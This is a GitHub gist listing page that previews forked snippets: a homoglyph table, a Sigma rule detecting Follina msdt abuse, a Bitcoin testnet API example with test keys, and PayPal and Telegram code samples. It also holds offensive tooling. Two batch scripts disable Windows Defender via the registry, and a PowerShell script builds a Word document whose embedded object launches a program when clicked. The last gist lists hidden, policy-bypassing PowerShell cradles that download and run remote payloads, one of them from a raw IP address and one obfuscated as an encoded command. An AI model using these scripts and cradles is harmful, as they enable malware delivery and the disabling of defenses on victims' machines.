| Original Letter | Look-Alike(s) |
|---|---|
| a | а ạ ą ä à á ą |
| c | с ƈ ċ |
| d | ԁ ɗ |
| e | е ẹ ė é è |
| g | ġ |
| h | һ |
Wh014M
/ Homoglyphs.md
Created
May 28, 2023 20:19
— forked from StevenACoffman/Homoglyphs.md
Unicode Look-alikes
Wh014M
/ suspicious_msdt_execution.yml
Created
June 21, 2022 20:04
— forked from embee-research/suspicious_msdt_execution.yml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| title: Suspicious msdt.exe execution - Office Exploit | |
| id: 97a80ed7-1f3f-4d05-9ef4-65760e634f6b | |
| status: experimental | |
| description: This rule will monitor suspicious arguments passed to the msdt.exe process. These arguments are an indicator of recent Office/Msdt exploitation. | |
| references: | |
| - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e | |
| - https://twitter.com/MalwareJake/status/1531019243411623939 | |
| author: 'Matthew Brennan' | |
| tags: | |
| - attack.execution |
Wh014M
/ gist:0c611c43bfb20e79a62cf0ba2130a78e
Created
March 10, 2022 16:52
— forked from matthieu/gist:b07c5ba27bc99188a15f
Create and send a Bitcoin transaction using the BlockCypher Transaction API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # In this example we're sending some test bitcoins from an address we control to a brand new test | |
| # address. We'll be sending the coins using the following address, public and private keys (please | |
| # don't abuse). | |
| # address : mtWg6ccLiZWw2Et7E5UqmHsYgrAi5wqiov | |
| # public : 03bb318b00de944086fad67ab78a832eb1bf26916053ecd3b14a3f48f9fbe0821f | |
| # private : 1af97b1f428ac89b7d35323ea7a68aba8cad178a04eddbbf591f65671bae48a2 | |
| # 1. generate a one-shot dummy address we're going to send money to | |
| $ curl -X POST http://api.blockcypher.com/v1/btc/test3/addrs | |
| { |
Wh014M
/ voice.json
Last active
September 29, 2021 00:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "action": "talk", | |
| "text": "arifa i love you ,please ", | |
| "language": "en-AU", | |
| "style": 3 | |
| } | |
| ] |
Wh014M
/ gist:a6044c593a1545f8eec15fb880e7cd10
Created
June 24, 2021 06:39
— forked from ShinNoNoir/gist:edd61d152911c5efbcfb
Python Selenium example for logging into Paypal
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Simple example to log into Paypal (far from feature complete) | |
| # Requires: Firefox installed on machine | |
| import getpass | |
| from selenium import webdriver | |
| from selenium.webdriver.common.keys import Keys | |
| LOGIN_URL = 'https://www.paypal.com/signin/' |
Wh014M
/ quick-disable-windows-defender.bat
Created
May 1, 2021 06:54
— forked from shadyeip/quick-disable-windows-defender.bat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!! | |
| rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference | |
| rem To also disable Windows Defender Security Center include this | |
| rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | |
| rem 1 - Disable Real-time protection | |
| reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
Wh014M
/ disable_windows_defender.bat
Created
May 1, 2021 06:23
— forked from pe3zx/disable_windows_defender.bat
Disable Windows Defender on Windows 10 1903
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!! | |
| rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference | |
| rem To also disable Windows Defender Security Center include this | |
| rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | |
| rem 1 - Disable Real-time protection | |
| reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
Wh014M
/ Main.java
Created
April 16, 2021 05:37
— forked from rubenlagus/Main.java
Example of sending a SendMessage method using Telegram API with ReplyMarkupKeyboard
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package org.telegram.example.SendMessage; | |
| import org.apache.http.NameValuePair; | |
| import org.apache.http.client.entity.UrlEncodedFormEntity; | |
| import org.apache.http.client.methods.HttpPost; | |
| import org.apache.http.message.BasicNameValuePair; | |
| import org.json.JSONArray; | |
| import org.json.JSONObject; | |
| import java.io.IOException; |
Wh014M
/ Forms.HTML.ps1
Created
March 25, 2021 10:12
— forked from securifybv/Forms.HTML.ps1
PowerShell script that creates a Word document with an embedded Forms.HTML:Image.1 object that when clicked will cause Calculator to be opened. See also: https://securify.nl/blog/SFY20180801/click-me-if-you-can_-office-social-engineering-with-embedded-objects.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # target file path | |
| $filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx' | |
| $progid = 'Forms.HTML:Image.1' | |
| $clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D' | |
| $html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/windows/system32/calc.exe">' | |
| # load assemblies for changing the docx (zip) file | |
| [void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem') | |
| [void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe") | |
| ## Version1 | |
| c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')" | |
| ## Version2 | |
| c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA |
NewerOlder